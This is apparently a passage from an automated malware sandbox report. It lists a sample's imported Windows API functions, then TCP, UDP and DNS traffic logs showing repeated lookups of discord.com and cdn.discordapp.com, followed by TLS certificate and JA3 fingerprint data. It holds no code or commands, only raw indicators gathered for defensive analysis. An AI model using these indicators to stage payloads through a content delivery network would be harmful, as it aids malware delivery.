                                                                                                          user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                          kernel32.dllSleep
                                                                                                          oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                          ole32.dllCoUninitialize, CoInitialize
                                                                                                          oleaut32.dllGetErrorInfo, SysFreeString
                                                                                                          comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls

                                                                                                          Possible Origin

                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                          EnglishUnited States

                                                                                                          Network Behavior

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Nov 28, 2020 10:27:38.393749952 CET49731443192.168.2.4162.159.128.233
                                                                                                          Nov 28, 2020 10:27:38.410197020 CET44349731162.159.128.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.410366058 CET49731443192.168.2.4162.159.128.233
                                                                                                          Nov 28, 2020 10:27:38.411195993 CET49731443192.168.2.4162.159.128.233
                                                                                                          Nov 28, 2020 10:27:38.427740097 CET44349731162.159.128.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.427881956 CET49731443192.168.2.4162.159.128.233
                                                                                                          Nov 28, 2020 10:27:38.511373997 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.527805090 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.527992964 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.533566952 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.549958944 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.551420927 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.551466942 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.551489115 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.551557064 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.602339983 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.618768930 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.624269962 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.676007986 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.714512110 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.730875969 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748243093 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748271942 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748286009 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748294115 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748311043 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748321056 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748344898 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748369932 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748368025 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.748388052 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748413086 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748421907 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.748437881 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748456001 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748481035 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748493910 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.748497963 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748518944 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748533964 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748544931 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.748548985 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748567104 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748583078 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748596907 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.748598099 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748616934 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748635054 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748651028 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748663902 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.748668909 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748686075 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748703003 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748719931 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748723984 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.748735905 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748759031 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748784065 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748786926 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.748811007 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748835087 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748838902 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.748857975 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748878002 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748897076 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748919964 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748931885 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.748944998 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748967886 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.748994112 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749001980 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.749021053 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749041080 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749052048 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.749063015 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749083996 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749103069 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749108076 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.749125957 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749146938 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749170065 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749175072 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.749201059 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749224901 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749227047 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.749247074 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749267101 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749281883 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749298096 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.749300957 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749322891 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749344110 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749358892 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.749363899 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.749437094 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.765702009 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.765732050 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.765748978 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.765767097 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.765784025 CET44349732162.159.135.233192.168.2.4

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Nov 28, 2020 10:27:32.105194092 CET4925753192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:32.132352114 CET53492578.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:33.249830008 CET6238953192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:33.276961088 CET53623898.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:34.431451082 CET4991053192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:34.466702938 CET53499108.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:35.653541088 CET5585453192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:35.680615902 CET53558548.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:36.803164959 CET6454953192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:36.830279112 CET53645498.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:37.973012924 CET6315353192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:38.000180006 CET53631538.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.349987030 CET5299153192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:38.377156019 CET53529918.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.482669115 CET5370053192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:38.509799004 CET53537008.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:39.898204088 CET5172653192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:39.925381899 CET53517268.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:41.057318926 CET5679453192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:41.095279932 CET53567948.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:42.109436989 CET5653453192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:42.136538982 CET53565348.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:43.149235010 CET5662753192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:43.176418066 CET53566278.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:44.227277040 CET5662153192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:44.254465103 CET53566218.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:27:45.288141012 CET6311653192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:27:45.315246105 CET53631168.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:01.659817934 CET6407853192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:01.686841011 CET53640788.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:11.242733002 CET6480153192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:11.279992104 CET53648018.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:19.475851059 CET6172153192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:19.859035969 CET53617218.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:25.990252972 CET5125553192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:26.017462015 CET53512558.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:26.737153053 CET6152253192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:26.764110088 CET53615228.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:27.368941069 CET5233753192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:27.406620979 CET53523378.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:27.743135929 CET5504653192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:27.770309925 CET53550468.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:28.462677002 CET4961253192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:28.489752054 CET53496128.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:29.264717102 CET4928553192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:29.300700903 CET53492858.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:30.103866100 CET5060153192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:30.130897999 CET53506018.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:31.089325905 CET6087553192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:31.125062943 CET53608758.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:31.554675102 CET5644853192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:31.598839045 CET53564488.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:32.459048033 CET5917253192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:32.488706112 CET53591728.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:32.806169987 CET6242053192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:32.841763020 CET53624208.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:37.820297956 CET6057953192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:37.847316027 CET53605798.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:37.995359898 CET5018353192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:38.022612095 CET53501838.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:41.341943979 CET6153153192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:41.388437033 CET53615318.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:46.367225885 CET4922853192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:46.394448996 CET53492288.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:28:46.575081110 CET5979453192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:28:46.603054047 CET53597948.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:29:11.508492947 CET5591653192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:29:11.535631895 CET53559168.8.8.8192.168.2.4
                                                                                                          Nov 28, 2020 10:29:14.363260984 CET5275253192.168.2.48.8.8.8
                                                                                                          Nov 28, 2020 10:29:14.390429974 CET53527528.8.8.8192.168.2.4

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                          Nov 28, 2020 10:27:38.349987030 CET192.168.2.48.8.8.80xcfebStandard query (0)discord.comA (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:27:38.482669115 CET192.168.2.48.8.8.80xc6f1Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:37.820297956 CET192.168.2.48.8.8.80x8216Standard query (0)discord.comA (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:37.995359898 CET192.168.2.48.8.8.80x9fd6Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:46.367225885 CET192.168.2.48.8.8.80x5393Standard query (0)discord.comA (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:46.575081110 CET192.168.2.48.8.8.80x1248Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                          Nov 28, 2020 10:27:38.377156019 CET8.8.8.8192.168.2.40xcfebNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:27:38.377156019 CET8.8.8.8192.168.2.40xcfebNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:27:38.377156019 CET8.8.8.8192.168.2.40xcfebNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:27:38.377156019 CET8.8.8.8192.168.2.40xcfebNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:27:38.377156019 CET8.8.8.8192.168.2.40xcfebNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:27:38.509799004 CET8.8.8.8192.168.2.40xc6f1No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:27:38.509799004 CET8.8.8.8192.168.2.40xc6f1No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:27:38.509799004 CET8.8.8.8192.168.2.40xc6f1No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:27:38.509799004 CET8.8.8.8192.168.2.40xc6f1No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:27:38.509799004 CET8.8.8.8192.168.2.40xc6f1No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:37.847316027 CET8.8.8.8192.168.2.40x8216No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:37.847316027 CET8.8.8.8192.168.2.40x8216No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:37.847316027 CET8.8.8.8192.168.2.40x8216No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:37.847316027 CET8.8.8.8192.168.2.40x8216No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:37.847316027 CET8.8.8.8192.168.2.40x8216No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:38.022612095 CET8.8.8.8192.168.2.40x9fd6No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:38.022612095 CET8.8.8.8192.168.2.40x9fd6No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:38.022612095 CET8.8.8.8192.168.2.40x9fd6No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:38.022612095 CET8.8.8.8192.168.2.40x9fd6No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:38.022612095 CET8.8.8.8192.168.2.40x9fd6No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:46.394448996 CET8.8.8.8192.168.2.40x5393No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:46.394448996 CET8.8.8.8192.168.2.40x5393No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:46.394448996 CET8.8.8.8192.168.2.40x5393No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:46.394448996 CET8.8.8.8192.168.2.40x5393No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:46.394448996 CET8.8.8.8192.168.2.40x5393No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:46.603054047 CET8.8.8.8192.168.2.40x1248No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:46.603054047 CET8.8.8.8192.168.2.40x1248No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:46.603054047 CET8.8.8.8192.168.2.40x1248No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:46.603054047 CET8.8.8.8192.168.2.40x1248No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                          Nov 28, 2020 10:28:46.603054047 CET8.8.8.8192.168.2.40x1248No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)

                                                                                                          HTTPS Packets

                                                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                          Nov 28, 2020 10:27:38.551489115 CET162.159.135.233443192.168.2.449732CN=ssl711320.cloudflaressl.com CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Oct 27 01:00:00 CET 2020 Thu Sep 25 02:00:00 CEST 2014 Thu Jan 01 01:00:00 CET 2004Thu May 06 01:59:59 CEST 2021 Tue Sep 25 01:59:59 CEST 2029 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                          CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Sep 25 02:00:00 CEST 2014Tue Sep 25 01:59:59 CEST 2029
                                                                                                          CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
                                                                                                          Nov 28, 2020 10:28:38.065438986 CET162.159.130.233443192.168.2.449755CN=ssl711320.cloudflaressl.com CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Oct 27 01:00:00 CET 2020 Thu Sep 25 02:00:00 CEST 2014 Thu Jan 01 01:00:00 CET 2004Thu May 06 01:59:59 CEST 2021 Tue Sep 25 01:59:59 CEST 2029 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                          CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Sep 25 02:00:00 CEST 2014Tue Sep 25 01:59:59 CEST 2029
                                                                                                          CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
